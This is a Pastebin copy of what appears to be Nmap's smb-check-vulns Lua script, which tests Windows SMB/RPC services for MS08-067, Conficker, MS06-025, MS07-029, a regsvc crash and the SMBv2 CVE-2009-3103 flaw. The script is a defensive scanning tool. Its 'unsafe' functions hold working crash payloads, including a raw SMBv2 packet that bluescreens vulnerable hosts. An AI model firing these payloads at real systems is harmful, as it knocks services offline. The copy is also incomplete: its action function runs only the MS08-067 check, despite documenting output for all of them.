API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 10th, 2016
148
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.94 KB | None | 0 0
raw download clone embed print report
  1. local msrpc = require "msrpc"
  2. local nmap = require "nmap"
  3. local smb = require "smb"
  4. local stdnse = require "stdnse"
  5. local string = require "string"
  6. local table = require "table"
  7.  
  8. description = [[
  9. Checks for vulnerabilities:
  10. * MS08-067, a Windows RPC vulnerability
  11. * Conficker, an infection by the Conficker worm
  12. * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
  13. * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
  14. * MS06-025, a Windows Ras RPC service vulnerability
  15. * MS07-029, a Windows Dns Server RPC service vulnerability
  16. WARNING: These checks are dangerous, and are very likely to bring down a server.
  17. These should not be run in a production environment unless you (and, more importantly,
  18. the business) understand the risks!
  19. As a system administrator, performing these kinds of checks is crucial, because
  20. a lot more damage can be done by a worm or a hacker using this vulnerability than
  21. by a scanner. Penetration testers, on the other hand, might not want to use this
  22. script -- crashing services is not generally a good way of sneaking through a
  23. network.
  24. If you set the script parameter <code>unsafe</code>, then scripts will run that are almost
  25. (or totally) guaranteed to crash a vulnerable system; do NOT specify <code>unsafe</code>
  26. in a production environment! And that isn't to say that non-unsafe scripts will
  27. not crash a system, they're just less likely to.
  28. If you set the script parameter <code>safe</code>, then script will run that rarely or never
  29. crash a vulnerable system. No promises, though.
  30. MS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that
  31. can allow remote code execution. Checking for MS08-067 is very dangerous, as the check
  32. is likely to crash systems. On a fairly wide scan conducted by Brandon Enright, we determined
  33. that on average, a vulnerable system is more likely to crash than to survive
  34. the check. Out of 82 vulnerable systems, 52 crashed.
  35. At the same time, MS08-067 is extremely critical to fix. Metasploit has a working and
  36. stable exploit for it, and any system vulnerable can very easily be compromised.
  37. Conficker. Checks if a host is infected with a known Conficker strain. This check
  38. is based on the simple conficker scanner found on this page:
  39. http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker.
  40. Thanks to the folks who wrote that scanner!
  41. regsvc DoS. Checks if a host is vulnerable to a crash in regsvc, caused
  42. by a null pointer dereference. I inadvertently discovered this crash while working
  43. on <code>smb-enum-sessions</code>, and discovered that it was repeatable. It's been
  44. reported to Microsoft (case #MSRC8742).
  45. This check WILL crash the service, if it's vulnerable, and requires a guest account
  46. or higher to work. It is considered <code>unsafe</code>.
  47. SMBv2 DoS. Performs a denial-of-service against the vulnerability disclosed in
  48. CVE-2009-3103. Checks if the server went offline. This works agianst Windows Vista
  49. and some versions of Windows 7, and causes a bluescreen if successful. The
  50. proof-of-concept code at http://seclists.org/fulldisclosure/2009/Sep/39 was used,
  51. with one small change.
  52. MS06-025. Vulnerability targets the <code>RasRpcSumbitRequest()</code> RPC method which is
  53. a part of RASRPC interface that serves as a RPC service for configuring and
  54. getting information from the Remote Access and Routing service. RASRPC can be
  55. accessed using either "\ROUTER" SMB pipe or the "\SRVSVC" SMB pipe (usually on Windows XP machines).
  56. This is in RPC world known as "ncan_np" RPC transport. <code>RasRpcSumbitRequest()</code>
  57. method is a generic method which provides different functionalities according
  58. to the <code>RequestBuffer</code> structure and particulary the <code>RegType</code> field within that
  59. structure. <code>RegType</code> field is of <code>enum ReqTypes</code> type. This enum type lists all
  60. the different available operation that can be performed using the <code>RasRpcSubmitRequest()</code>
  61. RPC method. The one particular operation that this vuln targets is the <code>REQTYPE_GETDEVCONFIG</code>
  62. request to get device information on the RRAS.
  63. MS07-029. Vulnerability targets the <code>R_DnssrvQuery()</code> and <code>R_DnssrvQuery2()</code> RPC method which is
  64. a part of DNS Server RPC interface that serves as a RPC service for configuring and
  65. getting information from the DNS Server service. DNS Server RPC service can be
  66. accessed using "\dnsserver" SMB named pipe. The vulnerability is triggered when
  67. a long string is send as the "zone" parameter which causes the buffer overflow which
  68. crashes the service.
  69. (Note: if you have other SMB/MSRPC vulnerability checks you'd like to see added, and
  70. you can show me a tool with a license that is compatible with Nmap's, post a request
  71. on the nmap-dev mailing list and I'll add it to my list [Ron Bowes].)
  72. ]]
  73. ---
  74. --@usage
  75. -- nmap --script smb-check-vulns.nse -p445 <host>
  76. -- sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>
  77. --
  78. --@output
  79. -- Host script results:
  80. -- | smb-check-vulns:
  81. -- | MS08-067: NOT VULNERABLE
  82. -- | Conficker: Likely CLEAN
  83. -- | regsvc DoS: regsvc DoS: NOT VULNERABLE
  84. -- | SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
  85. -- | MS06-025: NO SERVICE (the Ras RPC service is inactive)
  86. -- |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
  87. --
  88. -- @args unsafe If set, this script will run checks that, if the system isn't
  89. -- patched, are basically guaranteed to crash something. Remember that
  90. -- non-unsafe checks aren't necessarily safe either)
  91. -- @args safe If set, this script will only run checks that are known (or at
  92. -- least suspected) to be safe.
  93. -----------------------------------------------------------------------
  94.  
  95. author = "Ron Bowes"
  96. copyright = "Ron Bowes"
  97. license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
  98. categories = {"intrusive","exploit","dos","vuln"}
  99. -- run after all smb-* scripts (so if it DOES crash something, it doesn't kill
  100. -- other scans have had a chance to run)
  101. dependencies = {
  102. "smb-brute", "smb-enum-sessions", "smb-security-mode",
  103. "smb-enum-shares", "smb-server-stats",
  104. "smb-enum-domains", "smb-enum-users", "smb-system-info",
  105. "smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
  106. "smb-psexec",
  107. };
  108.  
  109.  
  110. hostrule = function(host)
  111. return smb.get_port(host) ~= nil
  112. end
  113.  
  114. local VULNERABLE = 1
  115. local PATCHED = 2
  116. local UNKNOWN = 3
  117. local NOTRUN = 4
  118. local INFECTED = 5
  119. local INFECTED2 = 6
  120. local CLEAN = 7
  121. local NOTUP = 8
  122.  
  123. ---Check if the server is patched for MS08-067. This is done by calling NetPathCompare with an
  124. -- illegal string. If the string is accepted, then the server is vulnerable; if it's rejected, then
  125. -- you're safe (for now).
  126. --
  127. -- Based on a packet cap of this script, thanks go out to the author:
  128. -- http://labs.portcullis.co.uk/application/ms08-067-check/
  129. --
  130. -- If there's a licensing issue, please let me (Ron Bowes) know so I can
  131. --
  132. -- NOTE: This CAN crash stuff (ie, crash svchost and force a reboot), so beware! In about 20
  133. -- tests I did, it crashed once. This is not a guarantee.
  134. --
  135. --@param host The host object.
  136. --@return (status, result) If status is false, result is an error code; otherwise, result is either
  137. -- <code>VULNERABLE</code> for vulnerable, <code>PATCHED</code> for not vulnerable,
  138. -- <code>UNKNOWN</code> if there was an error (likely vulnerable), <code>NOTRUN</code>
  139. -- if this check was disabled, and <code>INFECTED</code> if it was patched by Conficker.
  140. function check_ms08_067(host)
  141. if(nmap.registry.args.safe ~= nil) then
  142. return true, NOTRUN
  143. end
  144. if(nmap.registry.args.unsafe == nil) then
  145. return true, NOTRUN
  146. end
  147. local status, smbstate
  148. local bind_result, netpathcompare_result
  149.  
  150. -- Create the SMB session
  151. status, smbstate = msrpc.start_smb(host, "\\\\BROWSER")
  152. if(status == false) then
  153. return false, smbstate
  154. end
  155.  
  156. -- Bind to SRVSVC service
  157. status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
  158. if(status == false) then
  159. msrpc.stop_smb(smbstate)
  160. return false, bind_result
  161. end
  162.  
  163. -- Call netpathcanonicalize
  164. -- status, netpathcanonicalize_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\a", "\\test\\")
  165.  
  166. local path1 = "\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\..\\n"
  167. local path2 = "\\n"
  168. status, netpathcompare_result = msrpc.srvsvc_netpathcompare(smbstate, host.ip, path1, path2, 1, 0)
  169.  
  170. -- Stop the SMB session
  171. msrpc.stop_smb(smbstate)
  172.  
  173. if(status == false) then
  174. if(string.find(netpathcompare_result, "WERR_INVALID_PARAMETER") ~= nil) then
  175. return true, INFECTED
  176. elseif(string.find(netpathcompare_result, "INVALID_NAME") ~= nil) then
  177. return true, PATCHED
  178. else
  179. return true, UNKNOWN, netpathcompare_result
  180. end
  181. end
  182.  
  183.  
  184. return true, VULNERABLE
  185. end
  186.  
  187. -- Help messages for the more common errors seen by the Conficker check.
  188. CONFICKER_ERROR_HELP = {
  189. ["NT_STATUS_BAD_NETWORK_NAME"] =
  190. [[UNKNOWN; Network name not found (required service has crashed). (Error NT_STATUS_BAD_NETWORK_NAME)]],
  191. -- http://seclists.org/nmap-dev/2009/q1/0918.html "non-Windows boxes (Samba on Linux/OS X, or a printer)"
  192. -- http://www.skullsecurity.org/blog/?p=209#comment-156
  193. -- "That means either it isn’t a Windows machine, or the service is
  194. -- either crashed or not running. That may indicate a failed (or
  195. -- successful) exploit attempt, or just a locked down system.
  196. -- NT_STATUS_OBJECT_NAME_NOT_FOUND can be returned if the browser
  197. -- service is disabled. There are at least two ways that can happen:
  198. -- 1) The service itself is disabled in the services list.
  199. -- 2) The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser\Parameters\MaintainServerList
  200. -- is set to Off/False/No rather than Auto or yes.
  201. -- On these systems, if you reenable the browser service, then the
  202. -- test will complete."
  203. ["NT_STATUS_OBJECT_NAME_NOT_FOUND"] =
  204. [[UNKNOWN; not Windows, or Windows with disabled browser service (CLEAN); or Windows with crashed browser service (possibly INFECTED).
  205. | If you know the remote system is Windows, try rebooting it and scanning
  206. |_ again. (Error NT_STATUS_OBJECT_NAME_NOT_FOUND)]],
  207. -- http://www.skullsecurity.org/blog/?p=209#comment-100
  208. -- "That likely means that the server has been locked down, so we
  209. -- don’t have access to the necessary pipe. Fortunately, that means
  210. -- that neither does Conficker — NT_STATUS_ACCESS_DENIED probably
  211. -- means you’re ok."
  212. ["NT_STATUS_ACCESS_DENIED"] =
  213. [[Likely CLEAN; access was denied.
  214. | If you have a login, try using --script-args=smbuser=xxx,smbpass=yyy
  215. | (replace xxx and yyy with your username and password). Also try
  216. |_ smbdomain=zzz if you know the domain. (Error NT_STATUS_ACCESS_DENIED)]],
  217. -- The cause of these two is still unknown.
  218. -- ["NT_STATUS_NOT_SUPPORTED"] =
  219. -- [[]]
  220. -- http://thatsbroken.com/?cat=5 (doesn't seem common)
  221. -- ["NT_STATUS_REQUEST_NOT_ACCEPTED"] =
  222. -- [[]]
  223. }
  224.  
  225. ---Check if the server is infected with Conficker. This can be detected by a modified MS08-067 patch,
  226. -- which rejects a different illegal string than the official patch rejects.
  227. --
  228. -- Based loosely on the Simple Conficker Scanner, found here:
  229. -- http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker/
  230. --
  231. -- If there's a licensing issue, please let me (Ron Bowes) know so I can fix it
  232. --
  233. --@param host The host object.
  234. --@return (status, result) If status is false, result is an error code; otherwise, result is either
  235. -- <code>INFECTED</code> for infected or <code>CLEAN</code> for not infected.
  236. function check_conficker(host)
  237. local status, smbstate
  238. local bind_result, netpathcompare_result
  239.  
  240. -- Create the SMB session
  241. status, smbstate = msrpc.start_smb(host, "\\\\BROWSER", true)
  242. if(status == false) then
  243. return false, smbstate
  244. end
  245.  
  246. -- Bind to SRVSVC service
  247. status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
  248. if(status == false) then
  249. msrpc.stop_smb(smbstate)
  250. return false, bind_result
  251. end
  252.  
  253. -- Try checking a valid string to find Conficker.D
  254. local netpathcanonicalize_result, error_result
  255. status, netpathcanonicalize_result, error_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\")
  256. if(status == true and netpathcanonicalize_result['can_path'] == 0x5c45005c) then
  257. msrpc.stop_smb(smbstate)
  258. return true, INFECTED2
  259. end
  260.  
  261. -- Try checking an illegal string ("\..\") to find Conficker.C and earlier
  262. status, netpathcanonicalize_result, error_result = msrpc.srvsvc_netpathcanonicalize(smbstate, host.ip, "\\..\\")
  263.  
  264. if(status == false) then
  265. if(string.find(netpathcanonicalize_result, "INVALID_NAME")) then
  266. msrpc.stop_smb(smbstate)
  267. return true, CLEAN
  268. elseif(string.find(netpathcanonicalize_result, "WERR_INVALID_PARAMETER") ~= nil) then
  269. msrpc.stop_smb(smbstate)
  270. return true, INFECTED
  271. else
  272. msrpc.stop_smb(smbstate)
  273. return false, netpathcanonicalize_result
  274. end
  275. end
  276.  
  277. -- Stop the SMB session
  278. msrpc.stop_smb(smbstate)
  279.  
  280. return true, CLEAN
  281. end
  282.  
  283. ---While writing <code>smb-enum-sessions</code> I discovered a repeatable null-pointer dereference
  284. -- in regsvc. I reported it to Microsoft, but because it's a simple DoS (and barely even that, because
  285. -- the service automatically restarts), and because it's only in Windows 2000, it isn't likely that they'll
  286. -- fix it. This function checks for that crash (by crashing the process).
  287. --
  288. -- The crash occurs when the string sent to winreg_enumkey() function is null.
  289. --
  290. --@param host The host object.
  291. --@return (status, result) If status is false, result is an error code; otherwise, result is either
  292. -- <code>VULNERABLE</code> for vulnerable or <code>PATCHED</code> for not vulnerable. If the check
  293. -- was skipped, <code>NOTRUN</code> is returned.
  294. function check_winreg_Enum_crash(host)
  295. if(nmap.registry.args.safe ~= nil) then
  296. return true, NOTRUN
  297. end
  298. if(nmap.registry.args.unsafe == nil) then
  299. return true, NOTRUN
  300. end
  301.  
  302. local i, j
  303. local elements = {}
  304. local status, bind_result, smbstate
  305.  
  306. -- Create the SMB session
  307. status, smbstate = msrpc.start_smb(host, msrpc.WINREG_PATH)
  308. if(status == false) then
  309. return false, smbstate
  310. end
  311.  
  312. -- Bind to WINREG service
  313. status, bind_result = msrpc.bind(smbstate, msrpc.WINREG_UUID, msrpc.WINREG_VERSION, nil)
  314. if(status == false) then
  315. msrpc.stop_smb(smbstate)
  316. return false, bind_result
  317. end
  318.  
  319. local openhku_result
  320. status, openhku_result = msrpc.winreg_openhku(smbstate)
  321. if(status == false) then
  322. msrpc.stop_smb(smbstate)
  323. return false, openhku_result
  324. end
  325.  
  326. -- Loop through the keys under HKEY_USERS and grab the names
  327. local enumkey_result
  328. status, enumkey_result = msrpc.winreg_enumkey(smbstate, openhku_result['handle'], 0, nil)
  329. msrpc.stop_smb(smbstate)
  330.  
  331. if(status == false) then
  332. return true, VULNERABLE
  333. end
  334.  
  335. return true, PATCHED
  336. end
  337.  
  338. local function check_smbv2_dos(host)
  339. local status, result
  340.  
  341. if(nmap.registry.args.safe ~= nil) then
  342. return true, NOTRUN
  343. end
  344. if(nmap.registry.args.unsafe == nil) then
  345. return true, NOTRUN
  346. end
  347.  
  348. -- From http://seclists.org/fulldisclosure/2009/Sep/0039.html with one change on the last line.
  349. local buf = string.char(0x00, 0x00, 0x00, 0x90) .. -- Begin SMB header: Session message
  350. string.char(0xff, 0x53, 0x4d, 0x42) .. -- Server Component: SMB
  351. string.char(0x72, 0x00, 0x00, 0x00) .. -- Negociate Protocol
  352. string.char(0x00, 0x18, 0x53, 0xc8) .. -- Operation 0x18 & sub 0xc853
  353. string.char(0x00, 0x26) .. -- Process ID High: --> :) normal value should be ", 0x00, 0x00"
  354. string.char(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xfe) ..
  355. string.char(0x00, 0x00, 0x00, 0x00, 0x00, 0x6d, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54) ..
  356. string.char(0x57, 0x4f, 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, 0x41, 0x4d, 0x20, 0x31) ..
  357. string.char(0x2e, 0x30, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00) ..
  358. string.char(0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57) ..
  359. string.char(0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61) ..
  360. string.char(0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4c) ..
  361. string.char(0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c) ..
  362. string.char(0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00, 0x02, 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e) ..
  363. string.char(0x30, 0x30, 0x32, 0x00)
  364.  
  365. local socket = nmap.new_socket()
  366. if(socket == nil) then
  367. return false, "Couldn't create socket"
  368. end
  369.  
  370. status, result = socket:connect(host, 445)
  371. if(status == false) then
  372. socket:close()
  373. return false, "Couldn't connect to host: " .. result
  374. end
  375.  
  376. status, result = socket:send(buf)
  377. if(status == false) then
  378. socket:close()
  379. return false, "Couldn't send the buffer: " .. result
  380. end
  381.  
  382. -- Close the socket
  383. socket:close()
  384.  
  385. -- Give it some time to crash
  386. stdnse.print_debug(1, "smb-check-vulns: Waiting 5 seconds to see if Windows crashed")
  387. stdnse.sleep(5)
  388.  
  389. -- Create a new socket
  390. socket = nmap.new_socket()
  391. if(socket == nil) then
  392. return false, "Couldn't create socket"
  393. end
  394.  
  395. -- Try and do something simple
  396. stdnse.print_debug(1, "smb-check-vulns: Attempting to connect to the host")
  397. socket:set_timeout(5000)
  398. status, result = socket:connect(host, 445)
  399.  
  400. -- Check the result
  401. if(status == false or status == nil) then
  402. stdnse.print_debug(1, "smb-check-vulns: Connect failed, host is likely vulnerable!")
  403. socket:close()
  404. return true, VULNERABLE
  405. end
  406.  
  407. -- Try sending something
  408. stdnse.print_debug(1, "smb-check-vulns: Attempting to send data to the host")
  409. status, result = socket:send("AAAA")
  410. if(status == false or status == nil) then
  411. stdnse.print_debug(1, "smb-check-vulns: Send failed, host is likely vulnerable!")
  412. socket:close()
  413. return true, VULNERABLE
  414. end
  415.  
  416. stdnse.print_debug(1, "smb-check-vulns: Checks finished; host is likely not vulnerable.")
  417. socket:close()
  418. return true, PATCHED
  419. end
  420.  
  421.  
  422. ---Check the existence of ms06_025 vulnerability in Microsoft Remote Routing
  423. --and Access Service. This check is not safe as it crashes the RRAS service and
  424. --its dependencies.
  425. --@param host Host object.
  426. --@return (status, result)
  427. --* <code>status == false</code> -> <code>result == NOTUP</code> which designates
  428. --that the targeted Ras RPC service is not active.
  429. --* <code>status == true</code> ->
  430. -- ** <code>result == VULNERABLE</code> for vulnerable.
  431. -- ** <code>result == PATCHED</code> for not vulnerable.
  432. -- ** <code>result == NOTRUN</code> if check skipped.
  433. function check_ms06_025(host)
  434. --check for safety flag
  435. if(nmap.registry.args.safe ~= nil) then
  436. return true, NOTRUN
  437. end
  438. if(nmap.registry.args.unsafe == nil) then
  439. return true, NOTRUN
  440. end
  441. --create the SMB session
  442. --first we try with the "\router" pipe, then the "\srvsvc" pipe.
  443. local status, smb_result, smbstate, err_msg
  444. status, smb_result = msrpc.start_smb(host, msrpc.ROUTER_PATH)
  445. if(status == false) then
  446. err_msg = smb_result
  447. status, smb_result = msrpc.start_smb(host, msrpc.SRVSVC_PATH) --rras is also accessible across SRVSVC pipe
  448. if(status == false) then
  449. return false, NOTUP --if not accessible across both pipes then service is inactive
  450. end
  451. end
  452. smbstate = smb_result
  453. --bind to RRAS service
  454. local bind_result
  455. status, bind_result = msrpc.bind(smbstate, msrpc.RASRPC_UUID, msrpc.RASRPC_VERSION, nil)
  456. if(status == false) then
  457. msrpc.stop_smb(smbstate)
  458. return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
  459. end
  460. if(bind_result['ack_result'] == 0x02) then --0x02 == PROVIDER_REJECTION
  461. msrpc.stop_smb(smbstate)
  462. return false, NOTUP --if bind operation results with true but PROVIDER_REJECTION, then the service is inactive.
  463. end
  464. local req, buff, sr_result
  465. req = msrpc.RRAS_marshall_RequestBuffer(
  466. 0x01,
  467. msrpc.RRAS_RegTypes['GETDEVCONFIG'],
  468. msrpc.random_crap(3000))
  469. status, sr_result = msrpc.RRAS_SubmitRequest(smbstate, req)
  470. msrpc.stop_smb(smbstate)
  471. --sanity check
  472. if(status == false) then
  473. stdnse.print_debug(
  474. 3,
  475. "check_ms06_025: RRAS_SubmitRequest failed")
  476. if(sr_result == "NT_STATUS_PIPE_BROKEN") then
  477. return true, VULNERABLE
  478. else
  479. return true, PATCHED
  480. end
  481. else
  482. return true, PATCHED
  483. end
  484. end
  485.  
  486. ---Check the existence of ms07_029 vulnerability in Microsoft Dns Server service.
  487. --This check is not safe as it crashes the Dns Server RPC service its dependencies.
  488. --@param host Host object.
  489. --@return (status, result)
  490. --* <code>status == false</code> -> <code>result == NOTUP</code> which designates
  491. --that the targeted Dns Server RPC service is not active.
  492. --* <code>status == true</code> ->
  493. -- ** <code>result == VULNERABLE</code> for vulnerable.
  494. -- ** <code>result == PATCHED</code> for not vulnerable.
  495. -- ** <code>result == NOTRUN</code> if check skipped.
  496. function check_ms07_029(host)
  497. --check for safety flag
  498. if(nmap.registry.args.safe ~= nil) then
  499. return true, NOTRUN
  500. end
  501. if(nmap.registry.args.unsafe == nil) then
  502. return true, NOTRUN
  503. end
  504. --create the SMB session
  505. local status, smbstate
  506. status, smbstate = msrpc.start_smb(host, msrpc.DNSSERVER_PATH)
  507. if(status == false) then
  508. return false, NOTUP --if not accessible across pipe then the service is inactive
  509. end
  510. --bind to DNSSERVER service
  511. local bind_result
  512. status, bind_result = msrpc.bind(smbstate, msrpc.DNSSERVER_UUID, msrpc.DNSSERVER_VERSION)
  513. if(status == false) then
  514. msrpc.stop_smb(smbstate)
  515. return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
  516. end
  517. --call
  518. local req_blob, q_result
  519. status, q_result = msrpc.DNSSERVER_Query(
  520. smbstate,
  521. "VULNSRV",
  522. string.rep("\\\13", 1000),
  523. 1)--any op num will do
  524. --sanity check
  525. msrpc.stop_smb(smbstate)
  526. if(status == false) then
  527. stdnse.print_debug(
  528. 3,
  529. "check_ms07_029: DNSSERVER_Query failed")
  530. if(q_result == "NT_STATUS_PIPE_BROKEN") then
  531. return true, VULNERABLE
  532. else
  533. return true, PATCHED
  534. end
  535. else
  536. return true, PATCHED
  537. end
  538. end
  539.  
  540. ---Returns the appropriate text to display, if any.
  541. --
  542. --@param check The name of the check; for example, 'ms08-067'.
  543. --@param message The message to display, such as 'VULNERABLE' or 'PATCHED'.
  544. --@param description [optional] Extra details about the message. nil for a blank message.
  545. --@param minimum_verbosity The minimum verbosity level required before the message is displayed.
  546. --@param minimum_debug [optional] The minimum debug level required before the message is displayed (default: 0).
  547. --@return A string with a textual representation of the error (or empty string, if it was determined that the message shouldn't be displayed).
  548. local function get_response(check, message, description, minimum_verbosity, minimum_debug)
  549. if(minimum_debug == nil) then
  550. minimum_debug = 0
  551. end
  552.  
  553. -- Check if we have appropriate verbosity/debug
  554. if(nmap.verbosity() >= minimum_verbosity and nmap.debugging() >= minimum_debug) then
  555. if(description == nil or description == '') then
  556. return string.format("%s: %s", check, message)
  557. else
  558. return string.format("%s: %s (%s)", check, message, description)
  559. end
  560. else
  561. return nil
  562. end
  563. end
  564.  
  565. action = function(host)
  566.  
  567. local status, result, message
  568. local response = {}
  569.  
  570. -- Check for ms08-067
  571. status, result, message = check_ms08_067(host)
  572. if(status == false) then
  573. table.insert(response, get_response("MS08-067", "ERROR", result, 0, 1))
  574. else
  575. if(result == VULNERABLE) then
  576. table.insert(response, get_response("MS08-067", "VULNERABLE", nil, 0))
  577. end
  578. end
  579.  
  580. return stdnse.format_output(true, response)
  581.  
  582. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!